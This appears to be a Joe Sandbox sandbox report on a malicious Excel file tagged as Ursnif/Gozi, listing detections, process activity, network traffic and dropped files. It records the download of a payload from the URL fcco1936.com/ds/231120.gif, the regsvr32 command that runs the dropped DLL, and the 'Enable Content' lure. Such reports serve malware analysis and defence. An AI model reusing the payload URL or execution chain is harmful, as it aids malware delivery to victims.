Loading ...

Play interactive tourEdit tour

Analysis Report document-1477931596.xls

Overview

General Information

Sample Name:document-1477931596.xls
Analysis ID:324303
MD5:1602c8c0a768d4c356e23fa86cca3daa
SHA1:0c9b5477aa41c557e2169e3cc21fa57f4ad051bd
SHA256:ba48de11db500e3903d175d9980adbb1305f991d839ec93068417c5eea86b424
Tags:goziSilentBuilderursnifxls

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found obfuscated Excel 4.0 Macro
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected hidden Macro 4.0 in Excel
Allocates a big amount of memory (probably used for heap spraying)
Document contains embedded VBA macros
IP address seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Registers a DLL
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2444 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 2320 cmdline: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
document-1477931596.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x4fea2:$s1: Excel
  • 0x50f1d:$s1: Excel
  • 0x389b:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
document-1477931596.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis: Data: Command: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll, CommandLine: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2444, ProcessCommandLine: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll, ProcessId: 2320

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: document-1477931596.xlsVirustotal: Detection: 37%Perma Link
    Source: document-1477931596.xlsMetadefender: Detection: 13%Perma Link

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exeJump to behavior
    Source: excel.exeMemory has grown: Private usage: 4MB later: 55MB
    Source: global trafficDNS query: name: fcco1936.com
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.253.218.120:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.253.218.120:80
    Source: Joe Sandbox ViewIP Address: 185.253.218.120 185.253.218.120
    Source: global trafficHTTP traffic detected: GET /ds/231120.gif HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: fcco1936.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /ds/231120.gif HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: fcco1936.comConnection: Keep-Alive
    Source: unknownDNS traffic detected: queries for: fcco1936.com
    Source: document-1477931596.xlsString found in binary or memory: http://fcco1936.com/ds/231120.gif
    Source: regsvr32.exe, 00000003.00000002.2094459045.0000000001CC0000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable Content X J7 - (" X 0' jR I" A A B C D E F G H I K L M N O P Q R S T : 1 2 3 4 5 6
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: document-1477931596.xlsInitial sample: CALL
    Source: document-1477931596.xlsInitial sample: CALL
    Source: document-1477931596.xlsInitial sample: CALL
    Source: document-1477931596.xlsInitial sample: CALL
    Source: document-1477931596.xlsInitial sample: EXEC
    Found obfuscated Excel 4.0 MacroShow sources
    Source: document-1477931596.xlsInitial sample: High usage of CHAR() function: 18
    Source: document-1477931596.xlsOLE indicator, VBA macros: true
    Source: document-1477931596.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
    Source: classification engineClassification label: mal80.expl.evad.winXLS@3/5@1/1
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\53EE0000Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRDA38.tmpJump to behavior
    Source: document-1477931596.xlsOLE indicator, Workbook stream: true
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: document-1477931596.xlsVirustotal: Detection: 37%
    Source: document-1477931596.xlsMetadefender: Detection: 13%
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dllJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Yara detected hidden Macro 4.0 in ExcelShow sources
    Source: Yara matchFile source: document-1477931596.xls, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting21Path InterceptionProcess Injection1Regsvr321OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsExtra Window Memory Injection1Masquerading1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonExtra Window Memory Injection1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    document-1477931596.xls38%VirustotalBrowse
    document-1477931596.xls16%MetadefenderBrowse
    document-1477931596.xls8%ReversingLabsDocument-Word.Trojan.Heuristic

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    fcco1936.com1%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    http://fcco1936.com/ds/231120.gif0%URL Reputationsafe
    http://fcco1936.com/ds/231120.gif0%URL Reputationsafe
    http://fcco1936.com/ds/231120.gif0%URL Reputationsafe
    http://fcco1936.com/ds/231120.gif0%URL Reputationsafe
    http://servername/isapibackend.dll0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    fcco1936.com
    185.253.218.120
    truefalseunknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://fcco1936.com/ds/231120.giffalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://servername/isapibackend.dllregsvr32.exe, 00000003.00000002.2094459045.0000000001CC0000.00000002.00000001.sdmpfalse
    • Avira URL Cloud: safe
    low

    Contacted IPs

    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs

    Public

    IPDomainCountryFlagASNASN NameMalicious
    185.253.218.120
    unknownUkraine
    202302NETH-ASUAfalse

    General Information

    Joe Sandbox Version:31.0.0 Red Diamond
    Analysis ID:324303
    Start date:29.11.2020
    Start time:04:15:05
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 4m 16s
    Hypervisor based Inspection enabled:false
    Report type:full
    Sample file name:document-1477931596.xls
    Cookbook file name:defaultwindowsofficecookbook.jbs
    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
    Number of analysed new started processes analysed:5
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • HDC enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal80.expl.evad.winXLS@3/5@1/1
    EGA Information:Failed
    HDC Information:Failed
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 0
    • Number of non-executed functions: 0
    Cookbook Comments:
    • Adjust boot time
    • Enable AMSI
    • Found application associated with file extension: .xls
    • Found Word or Excel or PowerPoint or XPS Viewer
    • Attach to Office via COM
    • Scroll down
    • Close Viewer
    Warnings:
    Show All
    • Exclude process from analysis (whitelisted): dllhost.exe

    Simulations

    Behavior and APIs

    No simulations

    Joe Sandbox View / Context

    IPs

    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    185.253.218.120document-1559468852.xlsGet hashmaliciousBrowse
    • fcco1936.com/ds/231120.gif
    document-1559468852.xlsGet hashmaliciousBrowse
    • fcco1936.com/ds/231120.gif
    document-1543123111.xlsGet hashmaliciousBrowse
    • fcco1936.com/ds/231120.gif
    document-1558228811.xlsGet hashmaliciousBrowse
    • fcco1936.com/ds/231120.gif
    document-1543123111.xlsGet hashmaliciousBrowse
    • fcco1936.com/ds/231120.gif
    document-1558228811.xlsGet hashmaliciousBrowse
    • fcco1936.com/ds/231120.gif
    document-1545621675.xlsGet hashmaliciousBrowse
    • fcco1936.com/ds/231120.gif
    document-1545621675.xlsGet hashmaliciousBrowse
    • fcco1936.com/ds/231120.gif
    document-1538761220.xlsGet hashmaliciousBrowse
    • fcco1936.com/ds/231120.gif
    document-1570163542.xlsGet hashmaliciousBrowse
    • fcco1936.com/ds/231120.gif
    document-1570163542.xlsGet hashmaliciousBrowse
    • fcco1936.com/ds/231120.gif
    document-1528081469.xlsGet hashmaliciousBrowse
    • fcco1936.com/ds/231120.gif
    document-1547667720.xlsGet hashmaliciousBrowse
    • fcco1936.com/ds/231120.gif
    document-1547667720.xlsGet hashmaliciousBrowse
    • fcco1936.com/ds/231120.gif
    document-1560478486.xlsGet hashmaliciousBrowse
    • fcco1936.com/ds/231120.gif
    document-1560478486.xlsGet hashmaliciousBrowse
    • fcco1936.com/ds/231120.gif
    document-1529051733.xlsGet hashmaliciousBrowse
    • fcco1936.com/ds/231120.gif
    document-1529051733.xlsGet hashmaliciousBrowse
    • fcco1936.com/ds/231120.gif
    document-1563857457.xlsGet hashmaliciousBrowse
    • fcco1936.com/ds/231120.gif
    document-1563857457.xlsGet hashmaliciousBrowse
    • fcco1936.com/ds/231120.gif

    Domains

    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    fcco1936.comdocument-1559468852.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1559468852.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1543123111.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1558228811.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1543123111.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1558228811.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1545621675.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1545621675.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1538761220.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1538761220.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1570163542.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1570163542.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1528081469.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1528081469.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1547667720.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1547667720.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1560478486.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1560478486.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1529051733.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1529051733.xlsGet hashmaliciousBrowse
    • 185.253.218.120

    ASN

    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    NETH-ASUAdocument-1559468852.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1559468852.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1543123111.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1558228811.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1543123111.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1558228811.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1545621675.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1545621675.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1538761220.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1538761220.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1570163542.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1570163542.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1528081469.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1528081469.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1547667720.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1547667720.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1560478486.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1560478486.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1529051733.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1529051733.xlsGet hashmaliciousBrowse
    • 185.253.218.120

    JA3 Fingerprints

    No context

    Dropped Files

    No context

    Created / dropped Files

    C:\Users\user\AppData\Local\Temp\C1EE0000
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:data
    Category:dropped
    Size (bytes):315295
    Entropy (8bit):7.985631460035784
    Encrypted:false
    SSDEEP:6144:6bEarFLPodmRqyAVYtlKsVLCyo7NtbcY7uLaG/9t7+MV:6DFPM8R3AsB+bjej/9ck
    MD5:0DA14F9087751DB1961100EA1893470E
    SHA1:BA6029F2DEC8F9D033CAD2C32E4989CAB08DB515
    SHA-256:A656DB448420909E7411413726CF737F6F7EA491FF029C3327A9AA5A15808852
    SHA-512:4F437115CB6729EAF5EFB75CE4123171F7572B6712D894C2D9D363B237121B73C6EFF843A5E82039230F9A7E66DCB9FD4B7644ADC12B21A8A31880967C9B36F6
    Malicious:false
    Reputation:low
    Preview: .V.N.0..4..y;J\@B.QS....A.>..o..~.6..=.nH..4DTb..s......j.U..>HkjrV.H..[!MS...?.OR..`.......Z|.6..:...M.I...Ei.-h.*.....z."...:...z>.]RnM...8.b..V.Q..f..wN...z.^...sNI."..OF.DJ.ZI...G..Up...-@.r^.......@.AMg.....sz~..A..d.f.C..\Jh..?0.w....9t..8.^.(n......F.g..Kk..q....%l8.*'Vi..1l...4...(ed..t........K.d.....T#}.{.Lo.+........"...&.2=..2.=../.^*..,#..q3...._.fD0..p.9..).....M6'7.{...9Y....s.Ft9S...}........g.z...E....v..........rh....YM..tZHM[.8.M.O.........PK..........!.C.T.....e.......[Content_Types].xml ...(..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Sun Nov 29 11:15:43 2020, atime=Sun Nov 29 11:15:43 2020, length=8192, window=hide
    Category:dropped
    Size (bytes):867
    Entropy (8bit):4.472086667312451
    Encrypted:false
    SSDEEP:12:85QUtCLgXg/XAlCPCHaXgzB8IB/Z2xX+WnicvbbbDtZ3YilMMEpxRljKzTdJP9TK:85htU/XTwz6IEYejDv3q+rNru/
    MD5:4EB79FC3DBBAFBC4208FE4C17FBC8C86
    SHA1:1414D34CE4C05D51BB29AA66A02B6307E0EFA984
    SHA-256:32D61DDE189DF89A18B632A517882175DA6BB0E444082635E0E66D99BBCF73E6
    SHA-512:5427E643201A87692AB5E260B75522F3CB950C3FDCF96C5B7FB7BA623D872C61F978F0C54D5256D3F9AE47B52DAD9A1B3C4FABA9F8A5EA3FC646F9A1F9754187
    Malicious:false
    Reputation:low
    Preview: L..................F...........7G...."\I....."\I.... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....}Q.a..Desktop.d......QK.X}Q.a*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\035347\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......035347..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\document-1477931596.LNK
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13 2020, mtime=Sun Nov 29 11:15:43 2020, atime=Sun Nov 29 11:15:43 2020, length=338432, window=hide
    Category:dropped
    Size (bytes):4236
    Entropy (8bit):4.5219932128064935
    Encrypted:false
    SSDEEP:96:8EGM/XLIkq+Qh2EGM/XLIkq+Qh2EGM/XLIkq+Qh2EGM/XLIkq+Q/:8EzIkfQEEzIkfQEEzIkfQEEzIkfQ/
    MD5:210300D25D431BCF7DC373B7FDE6E4F9
    SHA1:F5768846A69B1AF96D82A8A8117D1DDD694BCFE2
    SHA-256:FF7AEB4DB8E0B9CF3CAFD046D32ABCCCDFCC0DBC7F7ACC52A9BB304806756D10
    SHA-512:7F79ED6D23809AF75DA063337D1BD9D4DEE5831341A00789DAB4A2B281933D33A27BE91F90E7ACEDC11E5E429C6093F0E090A619366C87B91830608C89A4B09F
    Malicious:false
    Reputation:low
    Preview: L..................F.... .....+..{...."\I....~,\I....*...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....x.2..,..}Q.a .DOCUME~1.XLS..\.......Q.y.Q.y*...8.....................d.o.c.u.m.e.n.t.-.1.4.7.7.9.3.1.5.9.6...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\035347\Users.user\Desktop\document-1477931596.xls.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.u.m.e.n.t.-.1.4.7.7.9.3.1.5.9.6...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......035347..........D_....3N.
    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:ASCII text, with CRLF line terminators
    Category:modified
    Size (bytes):232
    Entropy (8bit):4.83180646166983
    Encrypted:false
    SSDEEP:6:dj6Y9LUhpFSELUhpF6Y9LUhpFSELUhpF6Y9LUhpFSELUhpF6Y9LUhpFy:dmFq8Fq8Fq8FE
    MD5:1F6FE2FE568AE2DC8BB9C17770783649
    SHA1:E230BF78C68BA076939BF4C8B0BA6DB63CABCD2D
    SHA-256:2925A50051AF70423D39B7C8047C4A64E51A9ECCD8502D68A8C5FEE62A6C24AF
    SHA-512:4149D54868768E24F72B5A80239534339DE73A046909C5732988A8A8EE68899EE7BC18CD21FEB6C7B524319E517B7828068BC33847A1D5560CBB2C3C29369339
    Malicious:false
    Reputation:low
    Preview: Desktop.LNK=0..[xls]..document-1477931596.LNK=0..document-1477931596.LNK=0..[xls]..document-1477931596.LNK=0..document-1477931596.LNK=0..[xls]..document-1477931596.LNK=0..document-1477931596.LNK=0..[xls]..document-1477931596.LNK=0..
    C:\Users\user\Desktop\53EE0000
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:Applesoft BASIC program data, first line number 16
    Category:dropped
    Size (bytes):398125
    Entropy (8bit):7.196710674927082
    Encrypted:false
    SSDEEP:6144:KcKoSsxzNDZLDZjlbR868O8KiA4XkXOn2xEtjPOtioVjDGUU1qfDlavx+W+LIfdS:Aizo8RnsIROnr6n75Y+t
    MD5:8C9275743115DFAD3D20CBFF693092D9
    SHA1:14E0CE31DC2276D1CFC34E92846BAF2784C4A0A1
    SHA-256:937E1EFAA9F2AEDC75CB47DD44A70730E83903AE0B22D5A21DD5CE295F6F5B53
